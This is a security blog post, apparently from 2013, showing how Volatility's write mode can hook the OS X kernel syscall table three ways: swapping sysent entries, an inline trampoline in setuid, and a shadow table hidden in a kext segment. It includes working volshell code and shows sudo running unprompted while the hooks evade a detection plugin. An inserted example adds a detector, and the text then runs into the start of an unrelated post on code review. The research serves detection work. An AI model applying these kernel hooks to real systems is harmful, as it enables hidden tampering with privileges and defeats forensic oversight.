After taking a brief detour into <a href="http://siliconblade.blogspot.com/2013/06/automated-secure-code-review-anyone.html" target="_blank">reviewing Java source code</a> I'm back to OS X and Volatility. In this post I'll be using <a href="https://code.google.com/p/volatility/" target="_blank">the Volatility Framework</a> to alter the OS X syscall table from an offensive perspective rather than using it for detection. To accomplish this, I'll be mimicking techniques used by malware, such as direct syscall table modification, syscall function inlining, patching the syscall handler, and hiding the payload in a binary's segment.<br />
<br />
<a name='more'></a><br />
<h2>
What's a Syscall Table?</h2>
<div>
Generally speaking, the syscall table is an array of function pointers. In UNIX, a system call is part of a defined list of functions that permit a userland process to interact with the kernel. A user process uses a system call to request the kernel to perform operations on its behalf. In <a href="http://en.wikipedia.org/wiki/XNU" target="_blank">XNU</a>, the syscall table is known as "sysent", and is no longer a public symbol, to prevent actions like syscall hooking. The list of entries is defined in the <a href="http://www.opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master" target="_blank">syscalls.master</a> file. Below is the structure of a sysent entry as represented by Volatility:</div>
<div>
<br /></div>
<div>
<pre><span style="font-size: x-small;">'sysent' (40 bytes)
0x0 : sy_narg ['short']
0x2 : sy_resv ['signed char']
0x3 : sy_flags ['signed char']
0x8 : sy_call ['pointer', ['void']]
0x10 : sy_arg_munge32 ['pointer', ['void']]
0x18 : sy_arg_munge64 ['pointer', ['void']]
0x20 : sy_return_type ['int']
0x24 : sy_arg_bytes ['unsigned short']</span>
</pre>
</div>
<br />
The sy_call member of the sysent struct contains the pointer to the syscall function.<br />
<h2>
Preparation</h2>
<div>
I'll be using a VMWare instance of OS X 10.8.3 as a target and Volatility's mac_volshell command with write access to alter the kernel. After firing up the VM, I issued the following command to drop to the volshell command line (by the way, I had to agree to enable write support...).</div>
<div>
<br /></div>
<div>
<pre><span style="font-size: x-small;">$ python vol.py mac_volshell -f ~/Documents/Virtual\ Machines/Mac\ OS\ X\ 10.8\ 64-bit.vmwarevm/Mac\ OS\ X\ 10.8\ 64-bit-af14d5f6.vmem --profile=MacMountainLion_10_8_3_AMDx64 -w
Volatile Systems Volatility Framework 2.3_beta
Write support requested. Please type "Yes, I want to enable write support" below precisely (case-sensitive):
Yes, I want to enable write support</span>
</pre>
</div>
<h2>
Syscall Interception by Directly Modifying the Syscall Table</h2>
A quick and easy example of modifying the syscall table is switching the setuid call with the exit call as explained in this <a href="http://www.phrack.org/issues.html?issue=66&id=16" target="_blank">Phrack article</a>. The code below retrieves the sysent entry addresses for the exit and setuid calls so we know what to modify. Then the sysent objects get instantiated to access their sy_call members, which contain the pointer to the syscall function. Finally, the code overwrites the setuid sysent's syscall function address with the exit sysent's syscall function address.<br />
<br />
<pre><span style="font-size: x-small;">>>> #get sysent addresses for exit and setuid
>>> nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
>>> sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")
>>> for (i, sysent) in enumerate(sysents):
...     if str(self.addrspace.profile.get_symbol_by_address("kernel",sysent.sy_call.v())) == "_setuid":
...         "setuid sysent at {0:#10x}".format(sysent.obj_offset)
...         "setuid syscall {0:#10x}".format(sysent.sy_call.v())
...     if str(self.addrspace.profile.get_symbol_by_address("kernel",sysent.sy_call.v())) == "_exit":
...         "exit sysent at {0:#10x}".format(sysent.obj_offset)
...         "exit syscall {0:#10x}".format(sysent.sy_call.v())
...
'exit sysent at 0xffffff8006455868'
'exit syscall 0xffffff8006155430'
'setuid sysent at 0xffffff8006455bd8'
'setuid syscall 0xffffff8006160910'
>>> #create sysent objects
>>> s_exit = obj.Object('sysent',offset=0xffffff8006455868,vm=self.addrspace)
>>> s_setuid = obj.Object('sysent',offset=0xffffff8006455bd8,vm=self.addrspace)
>>> #write exit function address to setuid function address
>>> self.addrspace.write(s_setuid.sy_call.obj_offset, struct.pack("<Q", s_exit.sy_call.v()))
True</span></pre>
<br />
After the switch if any program calls setuid, it will be redirected to the exit syscall, and end without issues. This won't be detected by Volatility's <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_check_syscalls" target="_blank">mac_check_syscalls plugin</a> as 'hooked' as of r3444. Volatility, on the other hand, will detect syscall table modifications that point to functions that are not listed within the symbols table.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCsaRVgqItVKdggm0jJBpBD5Twut6F3YazMXkBgasABTP3ZD4jCBspkGuABZlRCycmkOWBmtywPMk9auo5XYREYOhWyfxGi3GnSV_RNJoy0aOXMbyUZPPCBQx3zN6V-KmzCLqExDgx1A3/s1534/before-after-syscall-mod.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCsaRVgqItVKdggm0jJBpBD5Twut6F3YazMXkBgasABTP3ZD4jCBspkGuABZlRCycmkOWBmtywPMk9auo5XYREYOhWyfxGi3GnSV_RNJoy0aOXMbyUZPPCBQx3zN6V-KmzCLqExDgx1A3/s320/before-after-syscall-mod.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">mac_check_syscalls output before and after modification</td></tr>
</tbody></table>
<h2>
Syscall Function Interception or Inlining</h2>
For this case I'll be modifying the setuid syscall function's prologue to add a trampoline into the exit syscall function. The <a href="https://github.com/gdbinit/hydra/blob/master/hydra/hydra/hydra.c" target="_blank">following</a> will be used to modify the function:<br />
<br />
<pre><span style="font-size: x-small;">"\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00" // mov rax, address
"\xFF\xE0"; // jmp rax</span>
</pre>
<br />
The address place holder will be replaced with the exit syscall address as seen below:<br />
<br />
<pre><span style="font-size: x-small;">>>> buf = "\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xE0".encode("hex").replace("0000000000000000",struct.pack("<Q",self.addrspace.profile.get_symbol("_exit")).encode('hex'))
>>> buf
'48b83054550780ffffffffe0'
>>> import binascii
>>> self.addrspace.write(self.addrspace.profile.get_symbol("_setuid"),binascii.unhexlify(buf))
True</span>
</pre>
<br />
The function disassembly shows that the modification was successful:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMvv3zxTiM-srsx8h52zpmzm1u2J0eaV_SSImdgvFCjWHPWUN4Q9GuHhxdrxSko3MVQfDLKCY4UoqkqTmN1cyTHS9EOGYRzLXVfU-f-JPi64biw6dRe9xYHaFHaNtQh3SsZjiQJHNNPJq/s1088/before-after-dis-inlined.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMvv3zxTiM-srsx8h52zpmzm1u2J0eaV_SSImdgvFCjWHPWUN4Q9GuHhxdrxSko3MVQfDLKCY4UoqkqTmN1cyTHS9EOGYRzLXVfU-f-JPi64biw6dRe9xYHaFHaNtQh3SsZjiQJHNNPJq/s320/before-after-dis-inlined.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">setuid function prologue before and after modification</td></tr>
</tbody></table>
<br />
I also took screenshots of a '<a href="http://www.opensource.apple.com/source/sudo/sudo-17/sudo/sudo.c" target="_blank">sudo</a> -i' attempt before and after the function modification. Before the modification the system prompts for a password, but after the modification there is no such prompt since the call to setuid becomes a call to exit.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK5buvOvHaqlJQVTgXRJSnhLUBHPffVQ4lWVmxxTsbaLrQJbNZIWK1_B4ytdHjigaG9r2wnyEYVr-AoCYB1u93CvsTFNo-FMSt3S-ym_ZtjiMi-SkJ9ABVrKCC62Mpr1C2lpAK7CttyvtH/s1076/before-after-inlined.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK5buvOvHaqlJQVTgXRJSnhLUBHPffVQ4lWVmxxTsbaLrQJbNZIWK1_B4ytdHjigaG9r2wnyEYVr-AoCYB1u93CvsTFNo-FMSt3S-ym_ZtjiMi-SkJ9ABVrKCC62Mpr1C2lpAK7CttyvtH/s320/before-after-inlined.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">sudo -i execution attempts before and after setuid modification</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This type of function interception is also not detected by Volatility's <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_check_syscalls" target="_blank">mac_check_syscalls plugin</a>.<br />
<h2>
Patched Syscall Handler or Shadow Syscall Table</h2>
The shadowing of the syscall table is a technique that hides the attacker's modifications to the syscall table by creating a copy of it to modify and by keeping the original untouched. The attacker would need to alter all kernel references to the syscall table to point to the shadow syscall table for the attack to fully succeed. After the references are modified, the attacker can perform the syscall function interceptions described above without worrying much about detection.<br />
<br />
To perform the described attack in Volatility, I had to do the following:<br />
<ol>
<li>Find a suitable kernel extension (kext) that has enough free space to copy the syscall table into</li>
<li>Add a new segment to the binary and modify the segment count in the header (<a href="https://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html" target="_blank">mach-o format</a>)</li>
<li>Copy the syscall table into the segment's data</li>
<li>Modify kernel references to the syscall table to point to the shadow syscall table</li>
<li>Modify the shadow syscall table using the first technique described</li>
</ol>
<div>
Finding a suitable kext was pretty much trial and error for me. In my case "com.vmware.kext.vmhgfs" appeared to be a stable target.<br />
<br />
To find the kernel references to the syscall table (sysent), I first looked into the <a href="http://www.opensource.apple.com/source/xnu/xnu-2050.22.13/bsd/dev/i386/systemcalls.c" target="_blank">XNU source code</a> for the functions that reference it. The function unix_syscall64 appeared to be a good candidate since it has several references:<br />
<br />
<pre><span style="font-size: x-small;">...
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
uargp = (void *)(&regs->rdi);
if (__improbable(callp == sysent)) {
    /*
     * indirect system call... system call number
     * passed as 'arg0'
     */
    code = regs->rdi;
    callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
    uargp = (void *)(&regs->rsi);
    args_in_regs = 5;
}
...</span>
</pre>
<br />
Then I disassembled the unix_syscall64 function in volshell to find the corresponding instructions so I could get the pointer to the syscall table. Since I knew the syscall table address, it was easy to find the references to it.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqBwq1GdrG3xxA-mSguXyhdl_vJLbkgEG4XhJqCOlzV6xFfuMH68vzQ530A2CgYdCivjVMaodmbjapY_I5gpZxL5K0zNl3Z2-4KmtxILl5ZB5tx_pZ2ZxvhNp6QwEgPJmKqaxYJyF5eBpM/s1104/Screen+Shot+2013-07-02+at+10.36.56+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqBwq1GdrG3xxA-mSguXyhdl_vJLbkgEG4XhJqCOlzV6xFfuMH68vzQ530A2CgYdCivjVMaodmbjapY_I5gpZxL5K0zNl3Z2-4KmtxILl5ZB5tx_pZ2ZxvhNp6QwEgPJmKqaxYJyF5eBpM/s320/Screen+Shot+2013-07-02+at+10.36.56+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">unix_syscall64 references to the syscall table</td></tr>
</tbody></table>
To get the reference to the syscall table I ran the following code in volshell:</div>
<div>
<br /></div>
<div>
<pre><span style="font-size: x-small;">>>> tgt_addr = self.addrspace.profile.get_symbol("_unix_syscall64")
>>> buf = self.addrspace.read(tgt_addr, 200)
>>> for op in distorm3.Decompose(tgt_addr, buf, distorm3.Decode64Bits):
...     # targeting the instruction: CMP R13, [RIP+0x21fc16]
...     if op.mnemonic == "CMP" and 'FLAG_RIP_RELATIVE' in op.flags and op.operands[0].name == "R13":
...         print "Syscall Table Reference is at {0:#10x}".format(op.address + op.operands[1].disp + op.size)
...         break
...
Syscall Table Reference is at <b>0xffffff802ec000d0</b></span>
</pre>
</div>
<div>
<br /></div>
It appears that unix_syscall_return, unix_syscall64, unix_syscall, and some dtrace functions have references to the syscall table as well, so all we have to do is replace what the reference is pointing to with the shadow syscall table's address.<br />
<br />
To create the shadow syscall table I ran the following code in volshell, which performs the steps mentioned above:<br />
<br />
<pre><span style="font-size: x-small;"># get the address of the kernel extension (kext) list
p = self.addrspace.profile.get_symbol("_kmod")
kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)
kmod = kmodaddr.dereference_as("kmod_info")
# loop thru the list to find a suitable target to place the shadow syscall table in
while kmod.is_valid():
    if str(kmod.name) == "com.vmware.kext.vmhgfs":
        mh = obj.Object('mach_header_64', offset = kmod.address, vm = self.addrspace)
        o = mh.obj_offset
        # skip the mach_header_64 (32 bytes); the load commands start right after it
        o += 32
        # loop thru the load commands to find the end, used as the start of the injected segment
        for i in xrange(0, mh.ncmds):
            seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
            o += seg.cmdsize
            print "index {0} segname {1} cmd {2:x} offset {3:x} header cnt addr {4}".format(i, seg.segname, seg.cmd, o, mh.ncmds.obj_offset)
        # increment the header's load command count
        self.addrspace.write(mh.ncmds.obj_offset, chr(mh.ncmds + 1))
        # create a new segment starting at the last segment's end
        print "Creating new segment at {0:#10x}".format(o)
        seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
        # the new load command is of type LC_SEGMENT_64 (0x19)
        seg.cmd = 0x19
        seg.cmdsize = 0
        # name the segment __SHSYSCALL
        status = self.addrspace.write(seg.segname.obj_offset, '\x5f\x5f\x53\x48\x53\x59\x53\x43\x41\x4c\x4c')
        # the data (shadow syscall table) starts right after the command struct
        seg.vmaddr = o + self.addrspace.profile.get_obj_size('segment_command_64')
        seg.fileoff = 0
        seg.nsects = 0
        # size the segment to hold every syscall table entry; vmsize must be set before filesize is copied from it
        nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
        seg.vmsize = self.addrspace.profile.get_obj_size('sysent') * nsysent
        seg.filesize = seg.vmsize
        # copy the syscall table entries to the new location
        sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")
        for (i, sysent) in enumerate(sysents):
            status = self.addrspace.write(seg.vmaddr + (i * 40), self.addrspace.read(sysent.obj_offset, 40))
        print "The shadow syscall table is at {0:#10x}".format(seg.vmaddr)
        break
    kmod = kmod.next</span>
</pre>
<br />
While the volshell code might not be the cleanest, it worked for this proof of concept.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRDrM_ccJTeQKBC4M7tsOh29jdb59EVilCPECt22W-pKpAosyFlrvxVVU7O2mZNhPwhPWm79YrCRowjenwp-ObHj95NAfZ7dJDfTN65_S0WJazXOV2eRblegb22FW0TTHMpP4BBgI-X8b8/s1334/Screen+Shot+2013-07-02+at+11.45.51+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRDrM_ccJTeQKBC4M7tsOh29jdb59EVilCPECt22W-pKpAosyFlrvxVVU7O2mZNhPwhPWm79YrCRowjenwp-ObHj95NAfZ7dJDfTN65_S0WJazXOV2eRblegb22FW0TTHMpP4BBgI-X8b8/s320/Screen+Shot+2013-07-02+at+11.45.51+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">output from the syscall table copy code</td></tr>
</tbody></table>
Now that the syscall table reference and shadow syscall table are available, the reference can be modified.<br />
<br />
<pre><span style="font-size: x-small;">>>> #write shadow table address (0xffffff7fafdf5350) to reference (0xffffff802ec000d0)
>>> self.addrspace.write(0xffffff802ec000d0, struct.pack('Q', 0xffffff7fafdf5350))
True
>>> "{0:#10x}".format(obj.Object('Pointer', offset =0xffffff802ec000d0, vm = self.addrspace))
'0xffffff7fafdf5350'</span></pre>
The second command confirms that the syscall table reference no longer points to the original table, while the VM is still up and running.<br />
<br />
The last step of this method is to modify the shadow syscall table using the first method described (direct syscall table modification).<br />
<br />
<pre><span style="font-size: x-small;">>>> #get sysent addresses for exit and setuid
>>> nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
>>> sysents = obj.Object(theType = "Array", offset = <b>0xffffff7fafdf5350</b>, vm = self.addrspace, count = nsysent, targetType = "sysent")
>>> for (i, sysent) in enumerate(sysents):
...     if str(self.addrspace.profile.get_symbol_by_address("kernel", sysent.sy_call.v())) == "_setuid":
...         "setuid sysent at {0:#10x}".format(sysent.obj_offset)
...         "setuid syscall {0:#10x}".format(sysent.sy_call.v())
...     if str(self.addrspace.profile.get_symbol_by_address("kernel", sysent.sy_call.v())) == "_exit":
...         "exit sysent at {0:#10x}".format(sysent.obj_offset)
...         "exit syscall {0:#10x}".format(sysent.sy_call.v())
...
'exit sysent at 0xffffff7fafdf5378'
'exit syscall 0xffffff802e955430'
'setuid sysent at 0xffffff7fafdf56e8'
'setuid syscall 0xffffff802e960910'
>>> #create sysent objects
>>> s_exit = obj.Object('sysent', offset = 0xffffff7fafdf5378, vm = self.addrspace)
>>> s_setuid = obj.Object('sysent', offset = 0xffffff7fafdf56e8, vm = self.addrspace)
>>> #write exit function address to setuid function address
>>> self.addrspace.write(s_setuid.sy_call.obj_offset, struct.pack("<Q", s_exit.sy_call.v()))
True</span></pre>
<div>
<span style="font-size: x-small;"><br /></span></div>
As seen in the screenshot below, after the modification, sudo -i exits without prompting for a password at the target VM, but Volatility's check_syscalls plugin still shows the syscall table as unmodified.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9GS7aZzJRf7zAGkSajAyyN_5tuaI86Jm02oVD4PQbIrw4gd-LH1zBm6lYw0a_FAHHLE3CimaRGUfAfHVizB8R3ZT7vdhvl0V7b_gwABRw1v3bUyJLBX96K8d8HDUelYlCZFGGVAO7q-CK/s436/Screen+Shot+2013-07-03+at+12.33.07+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9GS7aZzJRf7zAGkSajAyyN_5tuaI86Jm02oVD4PQbIrw4gd-LH1zBm6lYw0a_FAHHLE3CimaRGUfAfHVizB8R3ZT7vdhvl0V7b_gwABRw1v3bUyJLBX96K8d8HDUelYlCZFGGVAO7q-CK/s200/Screen+Shot+2013-07-03+at+12.33.07+AM.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">sudo -i doesn't prompt for password</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2-RfidfOCY_-VOu5kJ1zywHupGef67ToyGmD3FCkEbKqxTsDAmOsis4eWa7G1Zo2N7bupvGA4xyX4Oxk4f_T3FWufUbmjb4-37Gat8UtNOM0yvW92fVUstWbHkSpejX1BlXCANYK1QSkM/s760/Screen+Shot+2013-07-03+at+12.34.24+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2-RfidfOCY_-VOu5kJ1zywHupGef67ToyGmD3FCkEbKqxTsDAmOsis4eWa7G1Zo2N7bupvGA4xyX4Oxk4f_T3FWufUbmjb4-37Gat8UtNOM0yvW92fVUstWbHkSpejX1BlXCANYK1QSkM/s320/Screen+Shot+2013-07-03+at+12.34.24+AM.png" width="316" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">check_syscall plugin showing unmodified syscall table</td></tr>
</tbody></table>
<br />
Note: It looks like the writes to the vmem file can take a bit to take effect.<br />
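The defensive counterpart to the procedure above, as an added example that is not the post's volshell code and not a Volatility plugin: given the reference addresses found by disassembly, check that each still points at the _sysent symbol and, where one does not, diff the table actually in use against the original so the swapped handler is named. The memory layout, the second reference address and the _sysent address are constructed; the sy_call offset inside struct sysent is an assumption about the 10.8 x86_64 layout.<br />

```python
"""Added example (not the blog's code): detect a shadowed OS X syscall table.

The post hides its sysent hook by pointing a kernel reference at a copy of the
table. The check below resolves each known reference, compares it with the
_sysent symbol and, when they differ, diffs the sy_call pointers of the table
in use against the original. Addresses marked constructed are not from a real
image; SY_CALL_OFF assumes sy_call follows sy_narg, two flag bytes and padding.
"""
import struct

SYSENT_SIZE = 40   # sizeof(struct sysent) on the profile the post uses
SY_CALL_OFF = 8    # assumed offset of sy_call within struct sysent


class FlatMemory:
    """Tiny stand-in for a Volatility address space: a few mapped byte regions."""

    def __init__(self):
        self.regions = []

    def map(self, base, data):
        self.regions.append((base, bytearray(data)))

    def _locate(self, addr, length):
        for base, buf in self.regions:
            if base <= addr and addr + length <= base + len(buf):
                return buf, addr - base
        raise ValueError("unmapped access at %#x" % addr)

    def read(self, addr, length):
        buf, off = self._locate(addr, length)
        return bytes(buf[off:off + length])

    def write(self, addr, data):
        buf, off = self._locate(addr, len(data))
        buf[off:off + len(data)] = data

    def read_ptr(self, addr):
        return struct.unpack("<Q", self.read(addr, 8))[0]


def sy_calls(mem, table, nsysent):
    """sy_call pointer of every entry of the sysent table at `table`."""
    return [mem.read_ptr(table + i * SYSENT_SIZE + SY_CALL_OFF) for i in range(nsysent)]


def check_sysent_refs(mem, sysent_sym, refs, nsysent, sym_by_addr):
    """Report every reference that no longer points at _sysent, together with
    the entries whose handler differs between the original and the live table."""
    original = sy_calls(mem, sysent_sym, nsysent)
    findings = []
    for ref in refs:
        live_table = mem.read_ptr(ref)
        if live_table == sysent_sym:
            continue
        live = sy_calls(mem, live_table, nsysent)
        hijacked = [(i, sym_by_addr.get(o, "?"), sym_by_addr.get(l, "?"))
                    for i, (o, l) in enumerate(zip(original, live)) if o != l]
        findings.append({"ref": ref, "live_table": live_table, "hijacked": hijacked})
    return findings


def build_sample():
    """Constructed image reproducing the post's end state: the unix_syscall64
    reference rewritten to a shadow table whose setuid entry calls exit."""
    exit_fn, setuid_fn = 0xffffff802e955430, 0xffffff802e960910   # from the post
    sysent_sym = 0xffffff802ec6b000        # constructed address of _sysent
    shadow = 0xffffff7fafdf5350            # shadow table address from the post
    ref_patched = 0xffffff802ec000d0       # the reference the post rewrote
    ref_clean = 0xffffff802ec00f00         # constructed second reference, untouched
    nsysent = 24                           # enough entries to reach setuid (#23)
    handlers = {i: 0xffffff802e900000 + i * 0x100 for i in range(nsysent)}  # constructed
    handlers[1], handlers[23] = exit_fn, setuid_fn
    table = b"".join(struct.pack("<hbb4xQQQiH2x", 0, 0, 0, handlers[i], 0, 0, 0, 0)
                     for i in range(nsysent))
    mem = FlatMemory()
    mem.map(sysent_sym, table)
    mem.map(shadow, table)                 # the copy the post's volshell code made
    mem.map(ref_patched, struct.pack("<Q", shadow))
    mem.map(ref_clean, struct.pack("<Q", sysent_sym))
    # last step of the post: setuid's sy_call replaced by exit's, in the shadow only
    mem.write(shadow + 23 * SYSENT_SIZE + SY_CALL_OFF, struct.pack("<Q", exit_fn))
    sym_by_addr = {exit_fn: "_exit", setuid_fn: "_setuid"}
    return mem, sysent_sym, [ref_patched, ref_clean], nsysent, sym_by_addr


def run_check():
    """Run the check over the constructed sample and return its findings."""
    return check_sysent_refs(*build_sample())


if __name__ == "__main__":
    for f in run_check():
        print("reference %#x -> %#x (not _sysent)" % (f["ref"], f["live_table"]))
        for idx, orig, live in f["hijacked"]:
            print("  syscall #%d: %s replaced by %s" % (idx, orig, live))
```

Disagreement between references is itself the signal: a clean image has every reference resolving to the same table as the symbol.<br />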
<h2>
Conclusion</h2>
<div>
I have gone through three examples that show how to mess with the OS X syscall table using the Volatility Framework. This exercise has shown that Volatility can be used to develop proof of concept attacks as well as detect them. Although the presented attacks are currently undetected by Volatility, this will change shortly with my <a href="http://siliconblade.blogspot.com/2013/07/back-to-defense-finding-hooks-in-os-x.html" target="_blank">next blog post</a>, which will reveal a <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py" target="_blank">new plugin</a>. Stay tuned! </div>
<div>
<br /></div>
<div>
<br /></div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-83252126204847026052013-06-26T09:04:00.000-07:002013-07-22T20:06:36.789-07:00Automated Secure Code Review Anyone?<h2>
Summary</h2>
Imagine you are given the source code for a JAVA web application of about a million lines and are asked to review the code for vulnerabilities and report back in a week. This can turn into an interesting exercise if you are a team of one. What are your options: crowdsource, ask for mercy, do your best? Thankfully there are other options, such as automated code review software. In this post I'll talk about <a href="http://www.checkmarx.com/" target="_blank">Checkmarx</a>'s <a href="http://lp.checkmarx.com/cxcloud-v1/" target="_blank">cloud based</a> solution for security code analysis and use <a href="https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project" target="_blank">OWASP's WebGoat</a> (v5.4) project to see how it measures up.<br />
<br />
<h2>
The Role of Automated Code Review Software</h2>
Generally speaking, automated source code analysis is used to assess compliance with a predefined set of rules or best practices. The analysis tool may provide the means for team collaboration and suggestions to fix the issues detected. The detected flaws may be displayed in a developer-friendly interface quite similar to popular <a href="http://en.wikipedia.org/wiki/Integrated_development_environment" target="_blank">IDEs</a>. Most tools use the <a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" target="_blank">OWASP Top 10</a> and <a href="http://www.sans.org/top25-software-errors/" target="_blank">SANS Top 25</a> as benchmarks for application security flaws when performing their audits. Using a documentation tool such as <a href="http://www.doxygen.org/" target="_blank">Doxygen</a> to view the general structure and call graphs will provide a better understanding when tracking the issues detected by the analysis tool. As with any automated security solution, an analyst should expect false positives in the results and be ready to eliminate them. The analyst should also keep in mind that business logic flaws and insecure use of software libraries will not be detected by these automated tools.<br />
<h2>
Looking at Checkmarx CxCloud On Demand</h2>
Checkmarx's web/cloud based secure code analysis solution <a href="http://www.checkmarx.com/technology/supported-coding-languages/" target="_blank">provides analysis</a> for JAVA, C#, PHP, C, C++, Visual Basic 6.0, VB.NET, Flash, APEX, Ruby, JavaScript, Perl, Objective C, PL/SQL and HTML5 source code, so it should be able to handle WebGoat without any issues. Checkmarx is also able to <a href="http://www.checkmarx.com/technology/vulnerability-coverage/" target="_blank">detect</a> OWASP Top 10 vulnerabilities and other high risk flaws, which is great for this test run.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7LXkwXctvA38ASQvMyBhyphenhyphenWljPe8uYFPFdgk28oz12lpX9RdsRXiJn5VDHeB7nD0IZcNGpOZAdSeAW7CN_3GWa62i6QZInpr76-9ze4Oz5DhamTaiwTZIhvzTPpZYjxx4NpQx_myPqL_q/s1600/Screen+Shot+2013-06-26+at+11.53.49+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7LXkwXctvA38ASQvMyBhyphenhyphenWljPe8uYFPFdgk28oz12lpX9RdsRXiJn5VDHeB7nD0IZcNGpOZAdSeAW7CN_3GWa62i6QZInpr76-9ze4Oz5DhamTaiwTZIhvzTPpZYjxx4NpQx_myPqL_q/s320/Screen+Shot+2013-06-26+at+11.53.49+AM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">OWASP WebGoat UI</td></tr>
</tbody></table>
After signing up for a <a href="http://lp.checkmarx.com/cxcloud-v1/" target="_blank">free trial account</a>, which supports the audit of applications up to 50K lines of code, we can easily create a project and upload the zipped war file.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
